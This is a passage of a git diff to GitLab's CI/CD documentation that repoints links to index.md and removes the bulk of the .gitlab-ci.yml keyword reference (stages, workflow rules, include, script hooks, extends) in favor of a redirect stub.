`CI_MERGE_REQUEST_TARGET_BRANCH_NAME` | 11.6 | all | The target branch name of the merge request. | -| `CI_MERGE_REQUEST_TARGET_BRANCH_SHA` | 11.9 | all | The HEAD SHA of the target branch of the merge request. The variable is empty in merge request pipelines. The SHA is present only in [merged results pipelines](../merge_request_pipelines/pipelines_for_merged_results/index.md). **(PREMIUM)** | +| `CI_MERGE_REQUEST_TARGET_BRANCH_SHA` | 11.9 | all | The HEAD SHA of the target branch of the merge request. The variable is empty in merge request pipelines. The SHA is present only in [merged results pipelines](../pipelines/pipelines_for_merged_results.md). **(PREMIUM)** | | `CI_MERGE_REQUEST_TITLE` | 11.9 | all | The title of the merge request. | | `CI_MERGE_REQUEST_EVENT_TYPE` | 12.3 | all | The event type of the merge request. Can be `detached`, `merged_result` or `merge_train`. | | `CI_MERGE_REQUEST_DIFF_ID` | 13.7 | all | The version of the merge request diff. | diff --git a/doc/ci/variables/where_variables_can_be_used.md b/doc/ci/variables/where_variables_can_be_used.md index 76d4d929ff0..beb19c8beea 100644 --- a/doc/ci/variables/where_variables_can_be_used.md +++ b/doc/ci/variables/where_variables_can_be_used.md @@ -7,7 +7,7 @@ type: reference # Where variables can be used -As it's described in the [CI/CD variables](README.md) docs, you can +As it's described in the [CI/CD variables](index.md) docs, you can define many different variables. Some of them can be used for all GitLab CI/CD features, but some of them are more or less limited. @@ -149,7 +149,7 @@ In the case of `after_script` scripts, they can: - Not use variables defined in `before_script` and `script`. These restrictions exist because `after_script` scripts are executed in a -[separated shell context](../yaml/README.md#after_script). +[separated shell context](../yaml/index.md#after_script). ## Persisted variables diff --git a/doc/ci/yaml/README.md b/doc/ci/yaml/README.md index 8e9cf00b160..5ab8653dc35 100644 --- a/doc/ci/yaml/README.md +++ b/doc/ci/yaml/README.md @@ -1,4874 +1,8 @@ --- -stage: Verify -group: Pipeline Execution -info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments -type: reference +redirect_to: 'index.md' --- -<!-- markdownlint-disable MD044 --> -<!-- vale gitlab.Spelling = NO --> -# Keyword reference for the .gitlab-ci.yml file **(FREE)** -<!-- vale gitlab.Spelling = YES --> -<!-- markdownlint-enable MD044 --> +This document was moved to [another location](index.md). -This document lists the configuration options for your GitLab `.gitlab-ci.yml` file. - -- For a quick introduction to GitLab CI/CD, follow the [quick start guide](../quick_start/index.md). -- For a collection of examples, see [GitLab CI/CD Examples](../examples/README.md). -- To view a large `.gitlab-ci.yml` file used in an enterprise, see the [`.gitlab-ci.yml` file for `gitlab`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/.gitlab-ci.yml). - -When you are editing your `.gitlab-ci.yml` file, you can validate it with the -[CI Lint](../lint.md) tool. - -## Job keywords - -A job is defined as a list of keywords that define the job's behavior. - -The keywords available for jobs are: - -| Keyword | Description | -| :-----------------------------------|:------------| -| [`after_script`](#after_script) | Override a set of commands that are executed after job. | -| [`allow_failure`](#allow_failure) | Allow job to fail. A failed job does not cause the pipeline to fail. | -| [`artifacts`](#artifacts) | List of files and directories to attach to a job on success. | -| [`before_script`](#before_script) | Override a set of commands that are executed before job. | -| [`cache`](#cache) | List of files that should be cached between subsequent runs. | -| [`coverage`](#coverage) | Code coverage settings for a given job. | -| [`dependencies`](#dependencies) | Restrict which artifacts are passed to a specific job by providing a list of jobs to fetch artifacts from. | -| [`environment`](#environment) | Name of an environment to which the job deploys. | -| [`except`](#only--except) | Control when jobs are not created. | -| [`extends`](#extends) | Configuration entries that this job inherits from. | -| [`image`](#image) | Use Docker images. | -| [`include`](#include) | Include external YAML files. | -| [`inherit`](#inherit) | Select which global defaults all jobs inherit. | -| [`interruptible`](#interruptible) | Defines if a job can be canceled when made redundant by a newer run. | -| [`needs`](#needs) | Execute jobs earlier than the stage ordering. | -| [`only`](#only--except) | Control when jobs are created. | -| [`pages`](#pages) | Upload the result of a job to use with GitLab Pages. | -| [`parallel`](#parallel) | How many instances of a job should be run in parallel. | -| [`release`](#release) | Instructs the runner to generate a [release](../../user/project/releases/index.md) object. | -| [`resource_group`](#resource_group) | Limit job concurrency. | -| [`retry`](#retry) | When and how many times a job can be auto-retried in case of a failure. | -| [`rules`](#rules) | List of conditions to evaluate and determine selected attributes of a job, and whether or not it's created. | -| [`script`](#script) | Shell script that is executed by a runner. | -| [`secrets`](#secrets) | The CI/CD secrets the job needs. | -| [`services`](#services) | Use Docker services images. | -| [`stage`](#stage) | Defines a job stage. | -| [`tags`](#tags) | List of tags that are used to select a runner. | -| [`timeout`](#timeout) | Define a custom job-level timeout that takes precedence over the project-wide setting. | -| [`trigger`](#trigger) | Defines a downstream pipeline trigger. | -| [`variables`](#variables) | Define job variables on a job level. | -| [`when`](#when) | When to run job. | - -### Unavailable names for jobs - -You can't use these keywords as job names: - -- `image` -- `services` -- `stages` -- `types` -- `before_script` -- `after_script` -- `variables` -- `cache` -- `include` - -### Custom default keyword values - -You can set global defaults for some keywords. Jobs that do not define one or more -of the listed keywords use the value defined in the `default:` section. - -These job keywords can be defined inside a `default:` section: - -- [`after_script`](#after_script) -- [`artifacts`](#artifacts) -- [`before_script`](#before_script) -- [`cache`](#cache) -- [`image`](#image) -- [`interruptible`](#interruptible) -- [`retry`](#retry) -- [`services`](#services) -- [`tags`](#tags) -- [`timeout`](#timeout) - -The following example sets the `ruby:3.0` image as the default for all jobs in the pipeline. -The `rspec 2.7` job does not use the default, because it overrides the default with -a job-specific `image:` section: - -```yaml -default: - image: ruby:3.0 - -rspec: - script: bundle exec rspec - -rspec 2.7: - image: ruby:2.7 - script: bundle exec rspec -``` - -## Global keywords - -Some keywords are not defined in a job. These keywords control pipeline behavior -or import additional pipeline configuration: - -| Keyword | Description | -|-------------------------|:------------| -| [`stages`](#stages) | The names and order of the pipeline stages. | -| [`workflow`](#workflow) | Control what types of pipeline run. | -| [`include`](#include) | Import configuration from other YAML files. | - -### `stages` - -Use `stages` to define stages that contain groups of jobs. `stages` is defined globally -for the pipeline. Use [`stage`](#stage) in a job to define which stage the job is -part of. - -The order of the `stages` items defines the execution order for jobs: - -- Jobs in the same stage run in parallel. -- Jobs in the next stage run after the jobs from the previous stage complete successfully. - -For example: - -```yaml -stages: - - build - - test - - deploy -``` - -1. All jobs in `build` execute in parallel. -1. If all jobs in `build` succeed, the `test` jobs execute in parallel. -1. If all jobs in `test` succeed, the `deploy` jobs execute in parallel. -1. If all jobs in `deploy` succeed, the pipeline is marked as `passed`. - -If any job fails, the pipeline is marked as `failed` and jobs in later stages do not -start. Jobs in the current stage are not stopped and continue to run. - -If no `stages` are defined in the `.gitlab-ci.yml` file, then `build`, `test` and `deploy` -are the default pipeline stages. - -If a job does not specify a [`stage`](#stage), the job is assigned the `test` stage. - -If a stage is defined, but no jobs use it, the stage is not visible in the pipeline. This is -useful for [compliance pipeline configuration](../../user/project/settings/index.md#compliance-pipeline-configuration) -because: - -- Stages can be defined in the compliance configuration but remain hidden if not used. -- The defined stages become visible when developers use them in job definitions. - -To make a job start earlier and ignore the stage order, use -the [`needs`](#needs) keyword. - -### `workflow` - -> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/29654) in GitLab 12.5 - -Use `workflow:` to determine whether or not a pipeline is created. -Define this keyword at the top level, with a single `rules:` keyword that -is similar to [`rules:` defined in jobs](#rules). - -You can use the [`workflow:rules` templates](#workflowrules-templates) to import -a preconfigured `workflow: rules` entry. - -`workflow: rules` accepts these keywords: - -- [`if`](#rulesif): Check this rule to determine when to run a pipeline. -- [`when`](#when): Specify what to do when the `if` rule evaluates to true. - - To run a pipeline, set to `always`. - - To prevent pipelines from running, set to `never`. -- [`variables`](#workflowrulesvariables): If not defined, uses the [variables defined elsewhere](#variables). - -When no rules evaluate to true, the pipeline does not run. - -Some example `if` clauses for `workflow: rules`: - -| Example rules | Details | -|------------------------------------------------------|-----------------------------------------------------------| -| `if: '$CI_PIPELINE_SOURCE == "merge_request_event"'` | Control when merge request pipelines run. | -| `if: '$CI_PIPELINE_SOURCE == "push"'` | Control when both branch pipelines and tag pipelines run. | -| `if: $CI_COMMIT_TAG` | Control when tag pipelines run. | -| `if: $CI_COMMIT_BRANCH` | Control when branch pipelines run. | - -See the [common `if` clauses for `rules`](../jobs/job_control.md#common-if-clauses-for-rules) for more examples. - -In the following example, pipelines run for all `push` events (changes to -branches and new tags). Pipelines for push events with `-draft` in the commit message -don't run, because they are set to `when: never`. Pipelines for schedules or merge requests -don't run either, because no rules evaluate to true for them: - -```yaml -workflow: - rules: - - if: $CI_COMMIT_MESSAGE =~ /-draft$/ - when: never - - if: '$CI_PIPELINE_SOURCE == "push"' -``` - -This example has strict rules, and pipelines do **not** run in any other case. - -Alternatively, all of the rules can be `when: never`, with a final -`when: always` rule. Pipelines that match the `when: never` rules do not run. -All other pipeline types run: - -```yaml -workflow: - rules: - - if: '$CI_PIPELINE_SOURCE == "schedule"' - when: never - - if: '$CI_PIPELINE_SOURCE == "push"' - when: never - - when: always -``` - -This example prevents pipelines for schedules or `push` (branches and tags) pipelines. -The final `when: always` rule runs all other pipeline types, **including** merge -request pipelines. - -If your rules match both branch pipelines and merge request pipelines, -[duplicate pipelines](../jobs/job_control.md#avoid-duplicate-pipelines) can occur. - -#### `workflow:rules:variables` - -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/294232) in GitLab 13.11. -> - [Deployed behind a feature flag](../../user/feature_flags.md), disabled by default. -> - [Enabled by default](https://gitlab.com/gitlab-org/gitlab/-/issues/300997) in GitLab 13.12. -> - Enabled on GitLab.com. -> - Recommended for production use. -> - For GitLab self-managed instances, GitLab administrators can opt to [disable it](#enable-or-disable-workflowrulesvariables). **(FREE SELF)** - -There can be -[risks when disabling released features](../../user/feature_flags.md#risks-when-disabling-released-features). -Refer to this feature's version history for more details. - -You can use [`variables`](#variables) in `workflow:rules:` to define variables for specific pipeline conditions. - -For example: - -```yaml -variables: - DEPLOY_VARIABLE: "default-deploy" - -workflow: - rules: - - if: $CI_COMMIT_REF_NAME == $CI_DEFAULT_BRANCH - variables: - DEPLOY_VARIABLE: "deploy-production" # Override globally-defined DEPLOY_VARIABLE - - if: $CI_COMMIT_REF_NAME =~ /feature/ - variables: - IS_A_FEATURE: "true" # Define a new variable. - - when: always # Run the pipeline in other cases - -job1: - variables: - DEPLOY_VARIABLE: "job1-default-deploy" - rules: - - if: $CI_COMMIT_REF_NAME == $CI_DEFAULT_BRANCH - variables: # Override DEPLOY_VARIABLE defined - DEPLOY_VARIABLE: "job1-deploy-production" # at the job level. - - when: on_success # Run the job in other cases - script: - - echo "Run script with $DEPLOY_VARIABLE as an argument" - - echo "Run another script if $IS_A_FEATURE exists" - -job2: - script: - - echo "Run script with $DEPLOY_VARIABLE as an argument" - - echo "Run another script if $IS_A_FEATURE exists" -``` - -When the branch is the default branch: - -- job1's `DEPLOY_VARIABLE` is `job1-deploy-production`. -- job2's `DEPLOY_VARIABLE` is `deploy-production`. - -When the branch is `feature`: - -- job1's `DEPLOY_VARIABLE` is `job1-default-deploy`, and `IS_A_FEATURE` is `true`. -- job2's `DEPLOY_VARIABLE` is `default-deploy`, and `IS_A_FEATURE` is `true`. - -When the branch is something else: - -- job1's `DEPLOY_VARIABLE` is `job1-default-deploy`. -- job2's `DEPLOY_VARIABLE` is `default-deploy`. - -##### Enable or disable workflow:rules:variables **(FREE SELF)** - -workflow:rules:variables is under development but ready for production use. -It is deployed behind a feature flag that is **enabled by default**. -[GitLab administrators with access to the GitLab Rails console](../../administration/feature_flags.md) -can opt to disable it. - -To enable it: - -```ruby -Feature.enable(:ci_workflow_rules_variables) -``` - -To disable it: - -```ruby -Feature.disable(:ci_workflow_rules_variables) -``` - -#### `workflow:rules` templates - -> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/217732) in GitLab 13.0. - -GitLab provides templates that set up `workflow: rules` -for common scenarios. These templates help prevent duplicate pipelines. - -The [`Branch-Pipelines` template](https://gitlab.com/gitlab-org/gitlab/-/tree/master/lib/gitlab/ci/templates/Workflows/Branch-Pipelines.gitlab-ci.yml) -makes your pipelines run for branches and tags. - -Branch pipeline status is displayed in merge requests that use the branch -as a source. However, this pipeline type does not support any features offered by -[merge request pipelines](../merge_request_pipelines/), like -[pipelines for merge results](../merge_request_pipelines/#pipelines-for-merged-results) -or [merge trains](../merge_request_pipelines/pipelines_for_merged_results/merge_trains/). -This template intentionally avoids those features. - -To [include](#include) it: - -```yaml -include: - - template: 'Workflows/Branch-Pipelines.gitlab-ci.yml' -``` - -The [`MergeRequest-Pipelines` template](https://gitlab.com/gitlab-org/gitlab/-/tree/master/lib/gitlab/ci/templates/Workflows/MergeRequest-Pipelines.gitlab-ci.yml) -makes your pipelines run for the default branch, tags, and -all types of merge request pipelines. Use this template if you use any of the -the [pipelines for merge requests features](../merge_request_pipelines/). - -To [include](#include) it: - -```yaml -include: - - template: 'Workflows/MergeRequest-Pipelines.gitlab-ci.yml' -``` - -#### Switch between branch pipelines and merge request pipelines - -> [Introduced in](https://gitlab.com/gitlab-org/gitlab/-/issues/201845) GitLab 13.8. - -To make the pipeline switch from branch pipelines to merge request pipelines after -a merge request is created, add a `workflow: rules` section to your `.gitlab-ci.yml` file. - -If you use both pipeline types at the same time, [duplicate pipelines](../jobs/job_control.md#avoid-duplicate-pipelines) -might run at the same time. To prevent duplicate pipelines, use the -[`CI_OPEN_MERGE_REQUESTS` variable](../variables/predefined_variables.md). - -The following example is for a project that runs branch and merge request pipelines only, -but does not run pipelines for any other case. It runs: - -- Branch pipelines when a merge request is not open for the branch. -- Merge request pipelines when a merge request is open for the branch. - -```yaml -workflow: - rules: - - if: '$CI_PIPELINE_SOURCE == "merge_request_event"' - - if: '$CI_COMMIT_BRANCH && $CI_OPEN_MERGE_REQUESTS' - when: never - - if: '$CI_COMMIT_BRANCH' -``` - -If the pipeline is triggered by: - -- A merge request, run a merge request pipeline. For example, a merge request pipeline - can be triggered by a push to a branch with an associated open merge request. -- A change to a branch, but a merge request is open for that branch, do not run a branch pipeline. -- A change to a branch, but without any open merge requests, run a branch pipeline. - -You can also add a rule to an existing `workflow` section to switch from branch pipelines -to merge request pipelines when a merge request is created. - -Add this rule to the top of the `workflow` section, followed by the other rules that -were already present: - -```yaml -workflow: - rules: - - if: $CI_COMMIT_BRANCH && $CI_OPEN_MERGE_REQUESTS && $CI_PIPELINE_SOURCE == "push" - when: never - - ... # Previously defined workflow rules here -``` - -[Triggered pipelines](../triggers/README.md) that run on a branch have a `$CI_COMMIT_BRANCH` -set and could be blocked by a similar rule. Triggered pipelines have a pipeline source -of `trigger` or `pipeline`, so `&& $CI_PIPELINE_SOURCE == "push"` ensures the rule -does not block triggered pipelines. - -### `include` - -> [Moved](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/42861) to GitLab Free in 11.4. - -Use `include` to include external YAML files in your CI/CD configuration. -You can break down one long `gitlab-ci.yml` file into multiple files to increase readability, -or reduce duplication of the same configuration in multiple places. - -You can also store template files in a central repository and `include` them in projects. - -`include` requires the external YAML file to have the extensions `.yml` or `.yaml`, -otherwise the external file is not included. - -You can't use [YAML anchors](#anchors) across different YAML files sourced by `include`. -You can only refer to anchors in the same file. To reuse configuration from different -YAML files, use [`!reference` tags](#reference-tags) or the [`extends` keyword](#extends). - -`include` supports the following inclusion methods: - -| Keyword | Method | -|:--------------------------------|:------------------------------------------------------------------| -| [`local`](#includelocal) | Include a file from the local project repository. | -| [`file`](#includefile) | Include a file from a different project repository. | -| [`remote`](#includeremote) | Include a file from a remote URL. Must be publicly accessible. | -| [`template`](#includetemplate) | Include templates that are provided by GitLab. | - -When the pipeline starts, the `.gitlab-ci.yml` file configuration included by all methods is evaluated. -The configuration is a snapshot in time and persists in the database. GitLab does not reflect any changes to -the referenced `.gitlab-ci.yml` file configuration until the next pipeline starts. - -The `include` files are: - -- Deep merged with those in the `.gitlab-ci.yml` file. -- Always evaluated first and merged with the content of the `.gitlab-ci.yml` file, - regardless of the position of the `include` keyword. - -NOTE: -Use merging to customize and override included CI/CD configurations with local -configurations. Local configurations in the `.gitlab-ci.yml` file override included configurations. - -#### Variables with `include` **(FREE SELF)** - -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/284883) in GitLab 13.8. -> - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/294294) in GitLab 13.9. - -You can [use some predefined variables in `include` sections](../variables/where_variables_can_be_used.md#gitlab-ciyml-file) -in your `.gitlab-ci.yml` file: - -```yaml -include: - project: '$CI_PROJECT_PATH' - file: '.compliance-gitlab-ci.yml' -``` - -For an example of how you can include these predefined variables, and the variables' impact on CI/CD jobs, -see this [CI/CD variable demo](https://youtu.be/4XR8gw3Pkos). - -#### `include:local` - -Use `include:local` to include a file that is in the same repository as the `.gitlab-ci.yml` file. -Use a full path relative to the root directory (`/`). - -If you use `include:local`, make sure that both the `.gitlab-ci.yml` file and the local file -are on the same branch. - -You can't include local files through Git submodules paths. - -All [nested includes](#nested-includes) are executed in the scope of the same project, -so it's possible to use local, project, remote, or template includes. - -Example: - -```yaml -include: - - local: '/templates/.gitlab-ci-template.yml' -``` - -You can also use shorter syntax to define the path: - -```yaml -include: '.gitlab-ci-production.yml' -``` - -Use local includes instead of symbolic links. - -##### `include:local` with wildcard file paths - -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/25921) in GitLab 13.11. -> - [Deployed behind a feature flag](../../user/feature_flags.md), disabled by default. -> - [Enabled by default](https://gitlab.com/gitlab-org/gitlab/-/issues/327315) in GitLab 13.12. -> - Enabled on GitLab.com. -> - Recommended for production use. -> - For GitLab self-managed instances, GitLab administrators can opt to disable it. **(CORE ONLY)** - -There can be -[risks when disabling released features](../../user/feature_flags.md#risks-when-disabling-released-features). -Refer to this feature's version history for more details. - -You can use wildcard paths (`*` and `**`) with `include:local`. - -Example: - -```yaml -include: 'configs/*.yml' -``` - -When the pipeline runs, GitLab: - -- Adds all `.yml` files in the `configs` directory into the pipeline configuration. -- Does not add `.yml` files in subfolders of the `configs` directory. To allow this, - add the following configuration: - - ```yaml - # This matches all `.yml` files in `configs` and any subfolder in it. - include: 'configs/**.yml' - - # This matches all `.yml` files only in subfolders of `configs`. - include: 'configs/**/*.yml' - ``` - -The wildcard file paths feature is under development but ready for production use. -It is deployed behind a feature flag that is **enabled by default**. -[GitLab administrators with access to the GitLab Rails console](../../administration/feature_flags.md) -can opt to disable it. - -To enable it: - -```ruby -Feature.enable(:ci_wildcard_file_paths) -``` - -To disable it: - -```ruby -Feature.disable(:ci_wildcard_file_paths) -``` - -#### `include:file` - -> [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/53903) in GitLab 11.7. - -To include files from another private project on the same GitLab instance, -use `include:file`. You can use `include:file` in combination with `include:project` only. -Use a full path, relative to the root directory (`/`). - -For example: - -```yaml -include: - - project: 'my-group/my-project' - file: '/templates/.gitlab-ci-template.yml' -``` - -You can also specify a `ref`. If you do not specify a value, the ref defaults to the `HEAD` of the project: - -```yaml -include: - - project: 'my-group/my-project' - ref: main - file: '/templates/.gitlab-ci-template.yml' - - - project: 'my-group/my-project' - ref: v1.0.0 - file: '/templates/.gitlab-ci-template.yml' - - - project: 'my-group/my-project' - ref: 787123b47f14b552955ca2786bc9542ae66fee5b # Git SHA - file: '/templates/.gitlab-ci-template.yml' -``` - -All [nested includes](#nested-includes) are executed in the scope of the target project. -You can use local (relative to target project), project, remote, or template includes. - -##### Multiple files from a project - -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/26793) in GitLab 13.6. -> - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/271560) in GitLab 13.8. - -You can include multiple files from the same project: - -```yaml -include: - - project: 'my-group/my-project' - ref: main - file: - - '/templates/.builds.yml' - - '/templates/.tests.yml' -``` - -#### `include:remote` - -Use `include:remote` with a full URL to include a file from a different location. -The remote file must be publicly accessible by an HTTP/HTTPS `GET` request, because -authentication in the remote URL is not supported. For example: - -```yaml -include: - - remote: 'https://gitlab.com/example-project/-/raw/main/.gitlab-ci.yml' -``` - -All [nested includes](#nested-includes) execute without context as a public user, -so you can only `include` public projects or templates. - -#### `include:template` - -> [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/53445) in GitLab 11.7. - -Use `include:template` to include `.gitlab-ci.yml` templates that are -[shipped with GitLab](https://gitlab.com/gitlab-org/gitlab/-/tree/master/lib/gitlab/ci/templates). - -For example: - -```yaml -# File sourced from the GitLab template collection -include: - - template: Auto-DevOps.gitlab-ci.yml -``` - -Multiple `include:template` files: - -```yaml -include: - - template: Android-Fastlane.gitlab-ci.yml - - template: Auto-DevOps.gitlab-ci.yml -``` - -All [nested includes](#nested-includes) are executed only with the permission of the user, -so it's possible to use project, remote or template includes. - -#### Nested includes - -> [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/56836) in GitLab 11.9. - -Use nested includes to compose a set of includes. - -You can have up to 100 includes, but you can't have duplicate includes. - -In [GitLab 12.4](https://gitlab.com/gitlab-org/gitlab/-/issues/28212) and later, the time limit -to resolve all files is 30 seconds. - -#### Additional `includes` examples - -View [additional `includes` examples](includes.md). - -## Keyword details - -The following topics explain how to use keywords to configure CI/CD pipelines. - -### `image` - -Use `image` to specify [a Docker image](../docker/using_docker_images.md#what-is-an-image) to use for the job. - -For: - -- Usage examples, see [Define `image` in the `.gitlab-ci.yml` file](../docker/using_docker_images.md#define-image-in-the-gitlab-ciyml-file). -- Detailed usage information, refer to [Docker integration](../docker/index.md) documentation. - -#### `image:name` - -An [extended Docker configuration option](../docker/using_docker_images.md#extended-docker-configuration-options). - -For more information, see [Available settings for `image`](../docker/using_docker_images.md#available-settings-for-image). - -#### `image:entrypoint` - -An [extended Docker configuration option](../docker/using_docker_images.md#extended-docker-configuration-options). - -For more information, see [Available settings for `image`](../docker/using_docker_images.md#available-settings-for-image). - -#### `services` - -Use `services` to specify a [service Docker image](../services/index.md), linked to a base image specified in [`image`](#image). - -For: - -- Usage examples, see [Define `services` in the `.gitlab-ci.yml` file](../services/index.md#define-services-in-the-gitlab-ciyml-file). -- Detailed usage information, refer to [Docker integration](../docker/index.md) documentation. -- Example services, see [GitLab CI/CD Services](../services/index.md). - -##### `services:name` - -An [extended Docker configuration option](../docker/using_docker_images.md#extended-docker-configuration-options). - -For more information, see [Available settings for `services`](../services/index.md#available-settings-for-services). - -##### `services:alias` - -An [extended Docker configuration option](../docker/using_docker_images.md#extended-docker-configuration-options). - -For more information, see [Available settings for `services`](../services/index.md#available-settings-for-services). - -##### `services:entrypoint` - -An [extended Docker configuration option](../docker/using_docker_images.md#extended-docker-configuration-options). - -For more information, see [Available settings for `services`](../services/index.md#available-settings-for-services). - -##### `services:command` - -An [extended Docker configuration option](../docker/using_docker_images.md#extended-docker-configuration-options). - -For more information, see [Available settings for `services`](../services/index.md#available-settings-for-services). - -### `script` - -Use `script` to specify a shell script for the runner to execute. - -All jobs except [trigger jobs](#trigger) require a `script` keyword. - -For example: - -```yaml -job: - script: "bundle exec rspec" -``` - -You can use [YAML anchors with `script`](#yaml-anchors-for-scripts). - -The `script` keyword can also contain several commands in an array: - -```yaml -job: - script: - - uname -a - - bundle exec rspec -``` - -Sometimes, `script` commands must be wrapped in single or double quotes. -For example, commands that contain a colon (`:`) must be wrapped in single quotes (`'`). -The YAML parser needs to interpret the text as a string rather than -a "key: value" pair. - -For example, this script uses a colon: - -```yaml -job: - script: - - curl --request POST --header 'Content-Type: application/json' "https://gitlab/api/v4/projects" -``` - -To be considered valid YAML, you must wrap the entire command in single quotes. If -the command already uses single quotes, you should change them to double quotes (`"`) -if possible: - -```yaml -job: - script: - - 'curl --request POST --header "Content-Type: application/json" "https://gitlab/api/v4/projects"' -``` - -You can verify the syntax is valid with the [CI Lint](../lint.md) tool. - -Be careful when using these characters as well: - -- `{`, `}`, `[`, `]`, `,`, `&`, `*`, `#`, `?`, `|`, `-`, `<`, `>`, `=`, `!`, `%`, `@`, `` ` ``. - -If any of the script commands return an exit code other than zero, the job -fails and further commands are not executed. Store the exit code in a variable to -avoid this behavior: - -```yaml -job: - script: - - false || exit_code=$? - - if [ $exit_code -ne 0 ]; then echo "Previous command failed"; fi; -``` - -#### `before_script` - -Use `before_script` to define an array of commands that should run before each job, -but after [artifacts](#artifacts) are restored. - -Scripts you specify in `before_script` are concatenated with any scripts you specify -in the main [`script`](#script). The combine scripts execute together in a single shell. - -You can overwrite a globally-defined `before_script` if you define it in a job: - -```yaml -default: - before_script: - - echo "Execute this script in all jobs that don't already have a before_script section." - -job1: - script: - - echo "This script executes after the global before_script." - -job: - before_script: - - echo "Execute this script instead of the global before_script." - script: - - echo "This script executes after the job's `before_script`" -``` - -You can use [YAML anchors with `before_script`](#yaml-anchors-for-scripts). - -#### `after_script` - -Use `after_script` to define an array of commands that run after each job, -including failed jobs. - -If a job times out or is cancelled, the `after_script` commands do not execute. -An [issue](https://gitlab.com/gitlab-org/gitlab/-/issues/15603) exists to support -executing `after_script` commands for timed-out or cancelled jobs. - -Scripts you specify in `after_script` execute in a new shell, separate from any -`before_script` or `script` scripts. As a result, they: - -- Have a current working directory set back to the default. -- Have no access to changes done by scripts defined in `before_script` or `script`, including: - - Command aliases and variables exported in `script` scripts. - - Changes outside of the working tree (depending on the runner executor), like - software installed by a `before_script` or `script` script. -- Have a separate timeout, which is hard coded to 5 minutes. See the - [related issue](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/2716) for details. -- Don't affect the job's exit code. If the `script` section succeeds and the - `after_script` times out or fails, the job exits with code `0` (`Job Succeeded`). - -```yaml -default: - after_script: - - echo "Execute this script in all jobs that don't already have an after_script section." - -job1: - script: - - echo "This script executes first. When it completes, the global after_script executes." - -job: - script: - - echo "This script executes first. When it completes, the job's `after_script` executes." - after_script: - - echo "Execute this script instead of the global after_script." -``` - -You can use [YAML anchors with `after_script`](#yaml-anchors-for-scripts). - -#### Script syntax - -You can use syntax in [`script`](README.md#script) sections to: - -- [Split long commands](script.md#split-long-commands) into multiline commands. -- [Use color codes](script.md#add-color-codes-to-script-output) to make job logs easier to review. -- [Create custom collapsible sections](../jobs/index.md#custom-collapsible-sections) - to simplify job log output. - -### `stage` - -Use `stage` to define which stage a job runs in. Jobs in the same -`stage` can execute in parallel (subject to [certain conditions](#use-your-own-runners)). - -Jobs without a `stage` entry use the `test` stage by default. If you do not define -[`stages`](#stages) in the pipeline, you can use the 5 default stages, which execute in -this order: - -- [`.pre`](#pre-and-post) -- `build` -- `test` -- `deploy` -- [`.post`](#pre-and-post) -For example: - -```yaml -stages: - - build - - test - - deploy - -job 0: - stage: .pre - script: make something useful before build stage - -job 1: - stage: build - script: make build dependencies - -job 2: - stage: build - script: make build artifacts - -job 3: - stage: test - script: make test - -job 4: - stage: deploy - script: make deploy - -job 5: - stage: .post - script: make something useful at the end of pipeline -``` - -#### Use your own runners - -When you use your own runners, each runner runs only one job at a time by default. -Jobs can run in parallel if they run on different runners. - -If you have only one runner, jobs can run in parallel if the runner's -[`concurrent` setting](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#the-global-section) -is greater than `1`. - -#### `.pre` and `.post` - -> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/31441) in GitLab 12.4. - -Use `pre` and `post` for jobs that need to run first or last in a pipeline. - -- `.pre` is guaranteed to always be the first stage in a pipeline. -- `.post` is guaranteed to always be the last stage in a pipeline. - -User-defined stages are executed after `.pre` and before `.post`. - -You must have a job in at least one stage other than `.pre` or `.post`. - -You can't change the order of `.pre` and `.post`, even if you define them out of order in the `.gitlab-ci.yml` file. -For example, the following configurations are equivalent: - -```yaml -stages: - - .pre - - a - - b - - .post -``` - -```yaml -stages: - - a - - .pre - - b - - .post -``` - -```yaml -stages: - - a - - b -``` - -### `extends` - -> Introduced in GitLab 11.3. - -Use `extends` to reuse configuration sections. It's an alternative to [YAML anchors](#anchors) -and is a little more flexible and readable. You can use `extends` to reuse configuration -from [included configuration files](#use-extends-and-include-together). - -In the following example, the `rspec` job uses the configuration from the `.tests` template job. -GitLab: - -- Performs a reverse deep merge based on the keys. -- Merges the `.tests` content with the `rspec` job. -- Doesn't merge the values of the keys. - -```yaml -.tests: - script: rake test - stage: test - only: - refs: - - branches - -rspec: - extends: .tests - script: rake rspec - only: - variables: - - $RSPEC -``` - -The result is this `rspec` job: - -```yaml -rspec: - script: rake rspec - stage: test - only: - refs: - - branches - variables: - - $RSPEC -``` - -`.tests` in this example is a [hidden job](#hide-jobs), but it's -possible to extend configuration from regular jobs as well. - -`extends` supports multi-level inheritance. You should avoid using more than three levels, -but you can use as many as eleven. The following example has two levels of inheritance: - -```yaml -.tests: - rules: - - if: $CI_PIPELINE_SOURCE == "push" - -.rspec: - extends: .tests - script: rake rspec - -rspec 1: - variables: - RSPEC_SUITE: '1' - extends: .rspec - -rspec 2: - variables: - RSPEC_SUITE: '2' - extends: .rspec - -spinach: - extends: .tests - script: rake spinach -``` - -In GitLab 12.0 and later, it's also possible to use multiple parents for -`extends`. - -#### Merge details - -You can use `extends` to merge hashes but not arrays. -The algorithm used for merge is "closest scope wins," so -keys from the last member always override anything defined on other -levels. For example: - -```yaml -.only-important: - variables: - URL: "http://my-url.internal" - IMPORTANT_VAR: "the details" - rules: - - if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH - - if: $CI_COMMIT_BRANCH == "stable" - tags: - - production - script: - - echo "Hello world!" - -.in-docker: - variables: - URL: "http://docker-url.internal" - tags: - - docker - image: alpine - -rspec: - variables: - GITLAB: "is-awesome" - extends: - - .only-important - - .in-docker - script: - - rake rspec -``` - -The result is this `rspec` job: - -```yaml -rspec: - variables: - 